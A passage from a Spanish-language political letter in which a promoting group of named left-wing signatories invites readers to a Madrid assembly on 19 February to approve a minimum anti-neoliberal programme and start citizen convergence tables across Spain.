Para darle el primer impulso a este proceso, aprobar el programa mínimo antineoliberal y lanzar el proceso de conformación de mesas para la convergencia ciudadana en todo el Estado, hemos convocado una Asamblea el próximo día 19 de febrero a las 11.00 horas en el Auditorio Marcelino Camacho de Madrid, Calle Lope de Vega nº 40.
Somos conscientes de que una convocatoria de este tipo no es muy frecuente. Pero existe una posibilidad real, hasta ahora tenida por imposible, de que se produzca una regresión dramática de las conquistas sociales, democráticas y culturales de los últimos treinta años. Está en juego, además, la propia existencia de la izquierda como actor político relevante. Por ello confiamos en tu responsabilidad y en tu generosidad en unos momentos tan importantes como los que estamos viviendo.
Un saludo cordial
El grupo promotor de la iniciativa
Juan Torres López, Manolo Monereo, Ricardo García Zaldívar, Carlos Martínez García, Armando Fernández Steinko, Roberto Viciano, Carlos Ruiz Escudero